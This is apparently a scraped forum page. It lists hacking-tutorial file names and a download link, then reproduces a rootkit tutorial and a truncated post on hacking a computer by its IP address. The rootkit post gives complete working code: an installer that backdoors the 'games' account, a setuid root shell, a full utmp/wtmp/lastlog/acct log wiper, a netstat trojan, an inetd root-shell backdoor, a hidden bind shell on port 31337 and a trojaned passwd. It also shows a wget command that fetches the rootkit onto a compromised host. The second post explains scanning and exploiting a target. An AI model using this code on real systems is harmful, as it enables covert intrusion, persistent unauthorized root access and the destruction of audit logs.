XP CD.txt Sp2 Tweaks.txt Speed Up Internet.txt Speed up menu display.txt Speed up Mozilla FireFox.txt Speed Up Your Bandwidth By 20% !, Windows uses 20% of your bandwidth.txt Speeding up menus in XP.txt Speeding up your internet connection under Linux and Windows.html Spoofing emails, via telenet.txt Standard ASCII Character Set.txt Steps to Clean Install XP.txt Stop A Restart Process In 3steps.txt Stop Annoying Pop-ups Without Pop-up Blockersoutli.txt Summary of FBI Computer Systems.txt SUNDEVIL.TXT SUPREM~1.TXT System Changes To Foil Hackers And Browser Hijacke.txt System File Checker For Windows Xp.txt TCP packet fragment attacks against firewalls and filters.txt Tcpip A Mammoth Description, Short and easy-Everything U want to know.txt Telenet-The Secret Exposed.txt telnet trick port 25.doc Testing Wattage Consumption Of Your Computer, Measuring your computer's wattage.txt The ABC's of Payphones part 1.txt The ABC's of Payphones part 2.txt The ABC's of Payphones part 3.txt The ABC's of Payphones part 4.txt The Antivirus Defense-in-Depth Guide.txt The Basics of Hacking- Introduction.txt The Baudy World of the Byte Bandit-A Postmodernist Interpreta.txt ThE Beige BoX .txt The Constitution in Cyberspace.txt The Cracking Manual.txt The difference between DVD-R, DVD+R, DVD+RW and DVD-RW.txt The Electronic Communication Privacy Act of 1986 - A Laymans .txt The Greatest Hacker of all time.ASC The Hacker's League.txt The History of British Phreaking.htm The Inner Circle Book's Hacking Techniques.txt The Lamahs-Guide to Pirating Software on the Internet.txt The M.M.C. Guide to Hacking, Phreaking, Carding.txt The Modern Phreakers Guide To Beige Boxing.txt The Modern Phreakers Guide To Payphones.txt The Moterola Bible.txt The Myth of the 2600Hz Detector .txt The National Information Infrastructure-Agenda for Action.txt The Newbies Handbook- ' How to beging in the World of Hacking.txt The Newbies-User's Guide to Hacking.txt The Official Phreaker's Manual.txt The Phreakers Handbook-1.txt The Port Guide, Port number and info.txt The Pre-History of Cyberspace.txt The Price of Copyright Violation.txt The REAL way to hack RemoteAccess.txt The Secret Service, UUCP,and The Legion of Doom.txt The Telephone Works.txt The Ultimate Guide To Installing Windows Xp Sp2.txt The Ultimate Phreaking Guide .txt the UNIX operating system (Berkley 4.2).txt Theft of Computer Software-A National Security Threat.txt Thoughts on the National Research and Education Network.txt Three Ways Of Bypass Starforce Cd Protection.txt Tip for shutdown windows - virus.txt Tips And Tricks, Windows XP.txt Tips on Starting Your Own BBS.1 Tired Of Reinstalling Windows.txt To Get And Show The Ip Via Javascript.txt Top 5 Myths About Safe Surfing, PC Magazine.txt Transferring Data.txt Translating Binary To Text.txt Translating Binary to Text2.txt Trojan Ports.txt Turn MSN Messenger Display Pix into User Pix on XP.txt Turn Off Unneeded Services, speed up pc.txt Tutorial Get the serial number you need.txt Tutorial How to create a bootable Windows XP SP1 CD (Nero).txt Tutorials - blacksun.box.sk Ultimate Google Way.txt ULTIMATE GUIDE TO BYPASS BIOS PASSWORDS!.txt Understanding the Telephone System.txt undocumented DOS commands.txt Uninstall Windows Xp And Return To My Old Windows.txt Uninstalling Norton 2004 Products.txt UNIX Computer Security Checklist.0 UNIX Use and Security - By the Prophet.txt UNIX Use and Security From The Ground Up.htm UNIX- A Hacking Tutorial.SIR Unlimited Rapidshare Downloads.txt Untold Window Tips.txt Untold Windows Secrets.txt Untold Windows Tips.txt Unused space on hard drives recovered.txt Use Hotkeys To Switch Programs.txt Useful Download Guide, Fix Down, 0daycn Ttdown, Links.txt User's Guide To Avoiding Virus Infections, Keeping an eye out for viruses.txt Using Google As A Calculator, A Tutorial.txt Using Google for searching ebooks.txt Using Rapid Share, How to use them and skip the BS.txt Video Avatars.txt Viewing Leftover Driver Entries.txt Virtual Memory Information.txt Virtual Memory Optimization Guide Rev. 4.0 - Final.txt Viruii FAQ.txt Virus-Trojan FAQ.txt Want To Download Torrent File By Using Google.txt Warez Definations.txt WAREZ DEFINITION.txt Way To Download From Brturbo, FireFox.txt We Don't Need No Education, Online classes made easy.txt Welcome to The king's meaning's of how to kick some-one's ASS!.txt What Files are Legal for Distribution on a BBS.txt What is the Registry.txt What Should I Do With Image Files.txt What To Look For In A Code Hacking Program.htm What To Look For In A Code Hacking Program.txt What You Should Know About Computer Viruses.DNA What You Wanted To Know About Movie Jargon, But Were Afraid To Ask.txt When Good Discs Go Bad.txt Where Is Winipcfg In Winxp.txt Who's Seeding The Net With Spyware.txt Why wait 35 Seconds at eZshare.txt Win 2000 Dr. Watsson.txt Windows 2000 Tips & Tricks.txt Windows 2003 System Restore, How to activate system restore in W2K3.txt Windows Scan Count Down Time.txt Windows Shortcuts.txt WINDOWS TRUE HIDDEN FILES.txt Windows Tweak, Hack Your Start Button.txt Windows Xp - Speed Up Your Network and Internet Access.txt WINDOWS XP HIDDEN APPS.txt Windows XP Registry Tweaks.txt Windows XP Startup and Performance Tweaks.txt Windows Xp Tips 'n' Tricks.txt Windows Xp Tweaks, A work in progress.txt Windows XP Tweaks.txt WinRar Tutorial - Compression profiles, passwords and more.txt Winsock 2 Repair.txt WinXP 3 Tips.txt Winxp Application Defrag, faster access for used programs.txt Winxp Applications Startup Time, Decrease your Applications startup time.txt WinXP Bootable CD.txt Winxp System Response, reboot whitout rebooting.txt Winxp Tips And Tricks, Winsock 2 repair.txt Xp Auto Install.txt Xp Folder View Does Not Stay To You're Setting., Grab your registry editor and join in.txt XP REPAIR INSTALL.txt XP Tweaking.txt Yahoo + geocities Posts.txt Yahoo Chat Commands how to.rtf Yahoo Messeger, no ad's.txt You Want Lots Of Music, Appz, Anything, Try Dex Hunting.txt Your Home Page Nevr Being Changed.txt Your Own Home Server - Introduction.txt Zen and the Art of Fone Phreaking `97 .txt [PHP] Navigations.txt http://rapidshare.com/files/60612690/200_Hacking_Tutorials_skenderbej.rar…; Added by ::../-\ 5 |-| @ |\| + i |-| @ ( |<3 r 5..:: ~5id3^3ffec+5~ at 10:10pm on July 6, 2008

Topic: Ninja - the art of being invisible: this i'm deeply sorry. This tut is for educational purpose only,and i mean that,if you have questions like "teach me how to hack" or "how do i hack hotmail" please keep them for yourself. If you think you've found any mistake in this file please let me know so i can fix it. 2) Introduction There is no big deal in getting root access on a box.Any script kiddie can do that. All he/she have to do is to search on packetstormsecurity.nl, neworder.box.sk, www.securiteam.com, www.securityfocus.com for the newest bugs. Then he/she compiles them and then the exploit is run against a vulnerable host. Of course a smart admin modifies the source of a certain daemon so that kernel response to fingerprints could be faked, but this is not the subject of my article. So, lets suppose you got root using...lets say the wu-ftpd 2.6.1 exploit by zen-parse. It spawns a connect back shell and you can type any command as root. Not for long because if you're idle a few minutes the connection with server is reset and you will have to do it all over again. You have root but you also filled the logs. The first entry in the logs is the exploit output. Then, if bash is modified to log everything you type, there is another problem :) So, what is a rootkit anyway? It is a program or a bunch of programs that helps you to keep access on a rooted box without being logged. Everytime you want to connect, the rootkit grants you access and then clears all the logs for you. But are you invisible? The answer is NO. After all, they are nothing but some new files and they can be found by a smart admin. The question is: how soon can they be found? How much time can you keep access? Forever, if the admin is dumb, not a single day if the admin knows his job. Well, many lamers have a rootkit. Usually they keep it on a ftp site. After they got root, they type: wget http://theirhost.com/rootkit.tgz gunzip rootkit.tgz tar -xvf rootkit.tar Then the rootkit is installed, rarely the logs are cleaned entirely coz so called "hackers" have no idea what they are doing, they dont even know programming. Now the race between hacker and admin begins. This is the funny part. The most common rootkits leave an open port so the hacker can connect later, usually a higher port like 31337. Bad move because the commands "ps -aux", "netstat -an" and "top" makes it visible and it is removed along with your access. Other rootkits are backdooring cron configuration file, so a port is open every 8 hours, lets say. A smart move would be to replace /bin/login file with a new one, that allows root access to a specified username and password. But there are scripts that checks file checksums and .. the admin might suspect something. You can modify the program to have same checksum with the original one. Sure, that takes time and you need a good rootkit right away. Adding a user with UID=0 and GID=0 is a bad idea also but it helps to keep access for a few days, especially if there are too many registered users. I wont say a thing about backdooring /etc/inetd.conf, /etc/services, .rhosts, those techniques are very well known. In the following i will present my idea of a rootkit. Before that, lets think logically: What are the logs we wanna remove our entries from? Let's say, for our (compromised) linux installation it is: /var/log/messages /var/adm/lastlog /var/adm/utmp /var/adm/wtmp tcp.log if linsniffer is running syslogd log file if the host has remote logging enabled What are the commands that represents a danger of revealing for our rootkit? ps top netstat w who rwho What's the logic behind building a rootkit? 1) to create a gate so you can get in any time you want 2) to clear the logs everytime 3) to hide it's processes 3) Building a rootkit I suppose the introduction part had bored you :) Lets try to build a rootkit. If you understand the idea, you can build your own rootkit. The following are available only if there is a way to connect to the machine, telnetd or sshd enabled. Advantages: - invisible to w, who, rwho and other commands used to monitor the system status - no port is left open - no trace is left in the logs - very easy to use Disadvantages: - well, the presence of a rootkit is a disadvantage :) - changes are visible in /etc/shadow..to a closer look though :) Files: install.sh kupdate.c cl.c Principles of working: Password for user games is changed. I changed the password for an existing user so the change wont be visible in /etc/passwd. Enough that it is visible in /etc/shadow :) When hacker connects to the system using user:games and the desired password, it will get a $ as a prompt meaning it has a local shell. Once he type kupdate it will become invisible to root and of course he will have UID=0 and GID=0. Almost all logs are cleared. install.sh ================================== cut here ================================== #!/bin/sh comp=`which gcc | grep no` if [ ! -z "$comp" ]; then echo "gcc not found!" exit fi passwd -d games echo "" echo "You will be prompted for a password for user games!" echo "" passwd games echo "" gcc kupdate.c -o kupdate mv kupdate /bin chmod +s /bin/kupdate # lame, better chown it and let it be executed only by games # it's just an example, be creative :) rm -f kupdate.c gcc clean.c -o cl mv cl /bin rm -f cl.c cl u games cl w games cl l games localhost echo "Done!" ================================== cut here ================================== When hacker connects to his rooted box, all he have to do is to type "kupdate" and he will become invisible with root access.I named it kupdate because to a "ps -A" command, [kupdate] is shown but it can create confusion for an unexperienced admin, ninja style right :) [kupdate] is not really a phisical file but a newbie admin dont know that and for sure he wont delete the file /bin/kupdate if he finds it by ant chance in /bin . Here it is: ================================== cut here ================================== main() { setuid(0); setgid(0); system("cl u games"); system("cl w games"); /* logs are being cleared */ system("cl l games localhost"); system("/bin/bash"); } ================================== cut here ================================== cl.c will clear utmp, wtmp and lastlog. Here it is: ================================== cut here ================================== #include #include #include #ifndef NO_ACCT #include #endif #include #include #include #include #include #include #include #include #include #ifdef HAVE_LASTLOG_H #include #endif #ifdef HAVE_UTMPX #include #endif #ifndef UTMP_FILE #ifdef _PATH_UTMP #define UTMP_FILE _PATH_UTMP #else #define UTMP_FILE "/var/adm/utmp" #endif #endif #ifndef WTMP_FILE #ifdef _PATH_WTMP define WTMP_FILE _PATH_WTMP #else #define WTMP_FILE "/var/adm/wtmp" #endif #endif #ifndef LASTLOG_FILE #ifdef _PATH_LASTLOG #define LASTLOG_FILE _PATH_LASTLOG #else #define LASTLOG_FILE "/var/adm/lastlog" #endif #endif #ifndef ACCT_FILE #define ACCT_FILE "/var/adm/pacct" #endif #ifdef HAVE_UTMPX #ifndef UTMPX_FILE #define UTMPX_FILE "/var/adm/utmpx" #endif #ifndef WTMPX_FILE #define WTMPX_FILE "/var/adm/wtmpx" #endif #endif /* HAVE_UTMPX */ #define BUFFSIZE 8192 /* * This function will copy the src file to the dst file. */ void copy_file(char *src, char *dst) { int fd1, fd2; int n; char buf[BUFFSIZE]; if ( (fd1 = open(src, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s during copy.\n", src); return; } if ( (fd2 = open(dst, O_WRONLY | O_CREAT | O_TRUNC)) < 0 ) { fprintf(stderr, "ERROR: Creating %s during copy.\n", dst); return; } while ( (n = read(fd1, buf, BUFFSIZE)) > 0) if (write(fd2, buf, n) != n) { fprintf(stderr, "ERROR: Write error during copy.\n"); return; } if (n < 0) { fprintf(stderr, "ERROR: Read error during copy.\n"); return; } close(fd1); close(fd2); } /* * UTMP editing. */ void wipe_utmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", UTMP_FILE); fflush(stdout); /* * Open the utmp file. */ if ( (fd1 = open(UTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMP_FILE); return; } /* * Copy utmp file excluding relevent entries. */ while ( read(fd1, &ut, sizeof(ut)) > 0) if ( !strncmp(ut.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (int) -sizeof(ut), SEEK_CUR); write(fd1, &ut, sizeof(ut)); } close(fd1); printf("Done.\n"); } /* * UTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_utmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", UTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(UTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", UTMPX_FILE); return; } while ( (read(fd1, &utx, sizeof(utx)) ) > 0) if ( !strncmp(utx.ut_name, who, strlen(who)) ) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (int) -sizeof(utx), SEEK_CUR); write(fd1, &utx, sizeof(utx)); } close(fd1); printf("Done.\n"); } #endif /* * WTMP editing. */ void wipe_wtmp(char *who, char *line) { int fd1; struct utmp ut; printf("Patching %s .... ", WTMP_FILE); fflush(stdout); /* * Open the wtmp file and temporary file. */ if ( (fd1 = open(WTMP_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMP_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(ut)), SEEK_END); while ( (read (fd1, &ut, sizeof(ut))) > 0) { if (!strncmp(ut.ut_name, who, strlen(who))) if (!line || (line && !strncmp(ut.ut_line, line, strlen(line)))) { bzero((char *) &ut, sizeof(ut)); lseek(fd1, (long) -(sizeof(ut)), SEEK_CUR); write(fd1, &ut, sizeof(ut)); break; } lseek(fd1, (long) -(sizeof(ut) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } /* * WTMPX editing if supported. */ #ifdef HAVE_UTMPX void wipe_wtmpx(char *who, char *line) { int fd1; struct utmpx utx; printf("Patching %s .... ", WTMPX_FILE); fflush(stdout); /* * Open the utmp file and temporary file. */ if ( (fd1 = open(WTMPX_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", WTMPX_FILE); return; } /* * Determine offset of last relevent entry. */ lseek(fd1, (long) -(sizeof(utx)), SEEK_END); while ( (read (fd1, &utx, sizeof(utx))) > 0) { if (!strncmp(utx.ut_name, who, strlen(who))) if (!line || (line && !strncmp(utx.ut_line, line, strlen(line)))) { bzero((char *) &utx, sizeof(utx)); lseek(fd1, (long) -(sizeof(utx)), SEEK_CUR); write(fd1, &utx, sizeof(utx)); break; } lseek(fd1, (int) -(sizeof(utx) * 2), SEEK_CUR); } close(fd1); printf("Done.\n"); } #endif /* * LASTLOG editing. */ void wipe_lastlog(char *who, char *line, char *timestr, char *host) { int fd1; struct lastlog ll; struct passwd *pwd; struct tm *tm; char str[4]; printf("Patching %s .... ", LASTLOG_FILE); fflush(stdout); tm = (struct tm *) malloc( sizeof(struct tm) ); /* * Open the lastlog file. */ if ( (fd1 = open(LASTLOG_FILE, O_RDWR)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", LASTLOG_FILE); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } lseek(fd1, (long) pwd->pw_uid * sizeof(struct lastlog), 0); bzero((char *) &ll, sizeof(ll)); if (line) strncpy(ll.ll_line, line, strlen(line)); if (timestr) { /* YYMMddhhmm */ if (strlen(timestr) != 10) { fprintf(stderr, "ERROR: Time format is YYMMddhhmm.\n"); return; } /* * Extract Times. */ str[2] = 0; str[0] = timestr[0]; str[1] = timestr[1]; tm->tm_year = atoi(str); str[0] = timestr[2]; str[1] = timestr[3]; tm->tm_mon = atoi(str) - 1; str[0] = timestr[4]; str[1] = timestr[5]; tm->tm_mday = atoi(str); str[0] = timestr[6]; str[1] = timestr[7]; tm->tm_hour = atoi(str); str[0] = timestr[8]; str[1] = timestr[9]; tm->tm_min = atoi(str); tm->tm_sec = 0; ll.ll_time = mktime(tm); } if (host) strncpy(ll.ll_host, host, sizeof(ll.ll_host)); write(fd1, (char *) &ll, sizeof(ll)); close(fd1); printf("Done.\n"); } #ifndef NO_ACCT /* * ACCOUNT editing. */ void wipe_acct(char *who, char *line) { int fd1, fd2; struct acct ac; char ttyn[50]; struct passwd *pwd; struct stat sbuf; char *tmpf; printf("Patching %s .... ", ACCT_FILE); fflush(stdout); /* * Open the acct file and temporary file. */ if ( (fd1 = open(ACCT_FILE, O_RDONLY)) < 0 ) { fprintf(stderr, "ERROR: Opening %s\n", ACCT_FILE); return; } /* * Grab a unique temporary filename. */ tmpf = tmpnam((char *) NULL); if ( (fd2 = open(tmpf, O_WRONLY | O_CREAT | O_TRUNC, 600)) < 0 ) { fprintf(stderr, "ERROR: Opening tmp ACCT file\n"); return; } if ( (pwd = getpwnam(who)) == NULL) { fprintf(stderr, "ERROR: Can't find user in passwd.\n"); return; } /* * Determine tty's device number */ strcpy(ttyn, "/dev/"); strcat(ttyn, line); if (stat(ttyn, &sbuf) < 0) { fprintf(stderr, "ERROR: Determining tty device number.\n"); return; } while ( read(fd1, &ac, sizeof(ac)) > 0 ) { if ( !(ac.ac_uid == pwd->pw_uid && ac.ac_tty == sbuf.st_rdev) ) write(fd2, &ac, sizeof(ac)); } close(fd1); close(fd2); copy_file(tmpf, ACCT_FILE); if ( unlink(tmpf) < 0 ) { fprintf(stderr, "ERROR: Unlinking tmp WTMP file.\n"); return; } printf("Done.\n"); } #endif void usage() { printf("USAGE: wipe [ u|w|l|a ] ...options...\n"); printf("\n"); printf("UTMP editing:\n"); printf(" Erase all usernames : wipe u [username]\n"); printf(" Erase one username on tty: wipe u [username] [tty]\n"); printf("\n"); printf("WTMP editing:\n"); printf(" Erase last entry for user : wipe w [username]\n"); printf(" Erase last entry on tty : wipe w [username] [tty]\n"); printf("\n"); printf("LASTLOG editing:\n"); printf(" Blank lastlog for user : wipe l [username]\n"); printf(" Alter lastlog entry : wipe l [username] [tty] [time] [host]\n"); printf(" Where [time] is in the format [YYMMddhhmm]\n"); printf("\n"); #ifndef NO_ACCT printf("ACCT editing:\n"); printf(" Erase acct entries on tty : wipe a [username] [tty]\n"); #endif exit(1); } int main(int argc, char *argv[]) { char c; if (argc < 3) usage(); /* * First character of first argument determines which file to edit. */ c = toupper(argv[1][0]); /* * UTMP editing. */ switch (c) { /* UTMP */ case 'U' : if (argc == 3) wipe_utmp(argv[2], (char *) NULL); if (argc ==4) wipe_utmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_utmpx(argv[2], (char *) NULL); if (argc == 4) wipe_utmpx(argv[2], argv[3]); #endif break; /* WTMP */ case 'W' : if (argc == 3) wipe_wtmp(argv[2], (char *) NULL); if (argc == 4) wipe_wtmp(argv[2], argv[3]); #ifdef HAVE_UTMPX if (argc == 3) wipe_wtmpx(argv[2], (char *) NULL); if (argc == 4) wipe_wtmpx(argv[2], argv[3]); #endif break; /* LASTLOG */ case 'L' : if (argc == 3) wipe_lastlog(argv[2], (char *) NULL, (char *) NULL, (char *) NULL); if (argc == 4) wipe_lastlog(argv[2], argv[3], (char *) NULL, (char *) NULL); if (argc == 5) wipe_lastlog(argv[2], argv[3], argv[4], (char *) NULL); if (argc == 6) wipe_lastlog(argv[2], argv[3], argv[4], argv[5]); break; #ifndef NO_ACCT /* ACCT */ case 'A' : if (argc != 4) usage(); wipe_acct(argv[2], argv[3]); break; #endif } return(0); } ================================== cut here ================================== It seems like our little rootkit is ready! Lets put the files together: root@nebunu~:# tar -cf rootkit.tar install.sh kupdate.c cl.c root@nebunu~:# gzip rootkit.tar root@nebunu~:# ftp ftp.myhost.com I'm uploading my rootkit rootkit.tar.gz into my archive and then after i root a host, i type on my rooted box: wget http://myhost.com/rootkit.tar.gz gunzip rootkit.tar.gz tar -xvf rootkit.tar sh install rm -f rootkit.tar rm -f install.sh That should be ready but..what if bash is modifyed to log everything? Then all i have to do is to type: killall -9 syslogd and then look for log file and modify it, not completely erase it!! Then syslogd must be started again, so the admin wont notice a thing! Here is a connection to a rooted box: ssh -l games hacked.host.com assword for user games: games@hacked.host.com~:$ kupdate Patching.... Done. Patching.... Done. Patching.... Done. bash# w No one logged in bash# Well, no one is logged in except me, i'm invisibl! Really? Lets not forget about /var/log/messages. I wont type rm -rf /, i'll just erase the last line, the one in which user games appears. Then, i wanna make sure about the presence of a sniffer/keylogger: bash# ps -aux If there is such a thing, search for the logs and then remove your entries but dont erase them! bash# find / -name *log* might be helpful sometimes. Ooops, almost forgot about it..there is one more problem. When the hacker connects to his hacked box , "netstat -an" shows his real IP. We have to fix that, dont we? :) Here is a script that does the job for us: netstat.sh ================================== cut here ================================== #!/bin/sh echo "netstat trojan by god-@EFNet" echo " " echo "whats the bclass ip you wana hide?" read bch echo "$bch" >> /var/tmp/.netstat if [ -f /bin/netstat ] then echo "netstat found on /bin/netstat" mv /bin/netstat /usr/local/bin/bzcat2 else echo "cant find /bin/netstat! =[" exit 1 fi cat >> netstat.c << _EOF_ #include #include #include #include #define NETTMP "/usr/local/bin/bzcat2" #define NETHIDE "/var/tmp/.netstat" int main() { FILE *fd; char fname[1024]; char sos[1024]; char sosa[1024]; strcpy(fname, NETHIDE); if(!(fd = (fopen(fname, "r")))) { printf("Error creating raw socket\n"); exit(0); } bzero(sos, sizeof(sos)); fgets(sos, sizeof(sos), fd); while(fgets(sos, sizeof(sos), fd)) { sprintf(sosa, "%s | grep -v %s", NETTMP, sos); system(sosa); exit(0); } return 0; fclose(fd); } _EOF_ cc netstat.c -o /bin/netstat echo "all done..." rm -f netstat.sh rm -f netstat.c ================================== cut here ================================== This is only an example, do the same with ps and top commands, and you will be totally invisible. It's much better to use existing /bin/netstat instead of changing it to another one.At least that way i think :) 4) Analyse of the other rootkits A) Well, so much about my idea of a rootkit. Lets analyse other kind of rootkits. If the hacked box is running inetd to start daemons then the inetd.conf backdooring is just great in that case: bash# echo "dhcp 21333/tcp # dhcp server" >>/etc/service bash# echo "dhcp stream tcp nowait root /bin/sh -i" >>/etc/inetd.conf bash# killall -HUP inetd then connect to hacked box using netcat: nc -vv hacked.box.server.com 21333 The other disadvantage is that anyone can connect to it and get root access. Here is a more elevate rootkit. It can be used along with the trojaned netstat. It is shown as -bash to a ps -A or ps -aux command :).The piece of code that does this is: strcpy(argv[0], HIDE); signal(SIGCHLD, SIG_IGN); where HIDE is defined as -bash. ================================== cut here ================================== #include #include #include #include #include #include #include #include #define P 31337 #define HIDE "-bash" #define SH "/bin/sh" #define LISTN 5 int main(int argc, char **argv) { char *fst = "\nConnected to rootkit!\n\n"; int outsock, insock, sz; struct sockaddr_in home; struct sockaddr_in away; home.sin_family=AF_INET; home.sin_port=htons(P); home.sin_addr.s_addr=INADDR_ANY; bzero(&(home.sin_zero), 8); strcpy(argv[0], HIDE); signal(SIGCHLD, SIG_IGN); if((outsock=socket(AF_INET, SOCK_STREAM, 0))<0) exit(printf("Socket error\n")); if((bind(outsock, (struct sockaddr *)&home, sizeof(home))<0)) exit(printf("Bind error\n")); if((listen(outsock, LISTN))<0) exit(printf("Listen error\n")); sz=sizeof(struct sockaddr_in); for(;;) { if((insock=accept(outsock, (struct sockaddr *)&away, &sz))<0) exit(printf("Accept error")); if(fork() !=0) { send(insock, fst, strlen(fst), 0); dup2(insock, 0); dup2(insock, 1); dup2(insock, 2); execl(SH, SH, (char *)0); close(insock); exit(0); } close(insock); } } ================================== cut here ================================== B) Example: another existing rootkit is t0rn. It can be downloaded from packetstormsecurity.nl. It uses a backdoored SSHD to listen on a port of your choice. rm, netstat, top, ps are deleted form system and replaced to backdoored ones that are not logging that procces.Then an entry is added in /etc/rc.d/rc.local, in case the server is rebooted the rootkit starts again. Very bad idea to use it! I tested it on my system and it gave me "Segmentation fault" each time i typed "netstat" or one of the backdoored files!If it is really necessary to backdoor system files them use a script like netstat.sh as i've shown before, dont change them entirely. Beside it puts some files in /dev, being very easily to trace by the admin. C) Example: ADORE is a well known tool that can hide any process. But if it is gonna be used to hid the rootkit there would be too many files on the hacked system. A very lame script can be used to trace new created files. Besides that, many problems may appear while compiling it. D) There is no such thing like a standard rootkit. That depends on the box you're hacking. For example if you hacked a free shell like nether.net ( it is not free anymore ), a good idea would be to backdoor a command like passwd.When "passwd -d username" or "passwd username" is invoked nothing happents, but when, lets say, "passwd -gimme root" is typed then /bin/sh would be executed.It is possible because on most systems i've met, passwd has +s set, so everyone can change his password.Here is the lame code: cp /usr/bin/passwd /bin/pass chmod +s /bin/pass rm usr/bin/passwd #!/bin/sh if [ "$1"="gimmerootrightaway" ]; then echo "Sure master!" /bin/bash else /bin/pass fi passwd gimmerootrightaway Sure master! bash# Nice heh :) D) Another interesting & easy to do exercise for you can be a http related backdoor. When a page is requested, a given command is executed as root. This type of rootkit will bypass many firewalls. 5) Final words So, what is the conclusion? What is the best rootkit? What is the best way to hide your traces? There is not a standard answer to these questions. That depends of system configuration, of running services, and last but not least of your knowledges and creativity. With a small effort someone can be nearly invisible on a hacked box, but not entirely! There is always a trace, but be careful so it wont point to you if the admin finds your rootkit, that is all that matters! Never ftp/telnet/ssh/irc outside from a rooted box! Never use BitchX or install a bouncer or a bot, they can be easily traced. Many lamers form undernet uses BitchX as a bot. They type: BitchX someirchost.com /nick lamer /join #channel /detach But what if the admin type scr-bx and wakeup /dev/tty before the "hacker" does? So, be careful, rootkits are illegal and you might be cought and thrown in jale. Use them only for learning and only on your own box! 6) Greetings Greetings to R3X, luc|f3r, alin777 and last but not least to box network. Box network should be an example of hard work and team work.Regardless my quarrels with some admins one thing i know for sure: the Internet would be much poor if box network didnt exist.Good luck guys and keep it that way!…; Added by Paulhammer at 12:56pm on November 26, 2008

Topic: How to hack with a ip address: referred mark of your choice. So I'm not going to go into that subject. Alright so say we got the targets IP Address finally. What do we do with this IP Address. Well first ping the IP Address to make sure that its alive. In otherwords online. Now at the bottom of this document ill include some links where you can obtain some key tools that may help on your journey through the electronic jungle. So we need to find places to get inside of the computer so we can start trying to find a way to "hack" the box. Port Scanners are used to identify the open ports on a machine thats running on a network, whether its a router, or a desktop computer, they will all have ports. Protocols use these ports to communicate with other services and resources on the network. 1) Blues Port Scanner - This program will scan the IP address that you chose and identify open ports that are on the target box. Example 1: Idlescan using Zombie (192.150.13.111:80); Class: Incremental Interesting ports on 208.225.90.120: (The 65522 ports scanned but not shown below are in state: closed) Port State Service 21/tcp open ftp 25/tcp open smtp 80/tcp open http 111/tcp open sunrpc 135/tcp open loc-srv 443/tcp open https 1027/tcp open IIS 1030/tcp open iad1 2306/tcp open unknown 5631/tcp open pcanywheredata 7937/tcp open unknown 7938/tcp open unknown 36890/tcp open unknown In example 1 now we see that there are a variety of ports open on this box. Take note of all the ports that you see listed before you. Most of them will be paired up with the type of protocol that uses that port (IE. 80-HTTP 25-SMTP Etc Etc...) Simply take all that information and paste it into notepad or the editor of your choice. This is the beginning of your targets record. So now we know what ports are open. These are all theoretical points of entry where we could wiggle into the computer system. But we all know its not that easy. Alright so we dont even know what type of software or what operating system that this system is running. 2) NMAP - Port Scanner - Has unique OS fingerprinting methods so when the program sees a certain series of ports open it uses its best judgement to guess what operating system its running. Generally correct with my experiences. So we have to figure out what type of software this box is running if we are gonna start hacking the thing right? Many of you have used TELNET for your MUDS and MOOS and weird multiplayer text dungeons and many of you havent even heard of it before period. TELNET is used to open a remote connection to an IP Address through a Port. So what that means is we are accessing their computer from across the internet, all we need is their IP Address and a port number. With that record you are starting to compile, open a TELNET connection to the IP Address and enter one of the OPEN ports that you found on the target. So say we typed 'TELNET -o xxx.xxx.xxx.xxx 25' This command will open up a connection through port 25 to the IP xxx.xxx.xxx.xxx. Now you may see some text at the very top of the screen. You may think, well what the hell, how is that little string of text going to help me. Well get that list you are starting to write, and copy the banners into your compilation of the information youve gathered on your target. Banners/Headers are what you get when you TELNET to the open ports. Heres an example of a banner from port 25. 220 jesus.gha.chartermi.net ESMTP Sendmail 8.12.8/8.12.8; Fri, 7 Oct 2005 01:22:29 -0400 Now this is a very important part in the enumeration process. You notice it says 'Sendmail 8.12.8/8.12.8' Well what do ya know, we now have discovered a version number. This is where we can start identifying the programs running on the machine. There are some instances in which companies will try and falsify their headers/banners so hackers are unable to find out what programs are truly installed. Now just copy all the banners from all the open ports *Some Ports May Have No Bannners* and organize them in the little record we have of the target. Now we have all the open ports, and a list of the programs running and their version numbers. This is some of the most sensitive information you can come across in the networking world. Other points of interest may be the DNS server, that contains lots of information and if you are able to manipulate it than you can pretend to hotmail, and steal a bunch of peoples email. Well now back to the task at handu. Apart from actual company secrets and secret configurations of the network hardware, you got some good juicy info. http://www.securityfocus.com is a very good resource for looking up software vulnerabilities. If you cant find any vulnerabilities there, search on google. There are many, many, many other sites that post vulnerabilities that their groups find and their affiliates. At SecurityFocus you can search through vendor and whatnot to try and find your peice of software, or you can use the search box. When i searched SecurityFocus i found a paper on how Sendmail 8.12.8 had a buffer overflow. There was proof of concept code where they wrote the shellcode and everything, so if you ran the code with the right syntax, a command prompt would just spawn. You should notice a (#) on the line where your code is being typed. That pound symbol means that the command prompt window thats currently open was opened as root. The highest privilage on a UNIX/Linux Box. You have just successfully hacked a box. Now that you have a command shell in front of you, you can start doing whatever you want, delete everything if you want to be a fucking jerk, however I dont recommend that. Maybe leave a text file saying how you did it and that they should patch their system.....whoever they are. And many times the best thing you can do is just lay in the shadows, dont let anyone know what you did. More often than not this is the path you are going to want to take to avoid unwanted visits by the authorities. There are many types of exploits out there, some are Denial of Service exploits, where you shut down a box, or render an application/process unusable. Called denial of service simply because you are denying a service on someones box to everyone trying to access it. Buffer Overflow exploits are involved when a variable inside some code doesnt 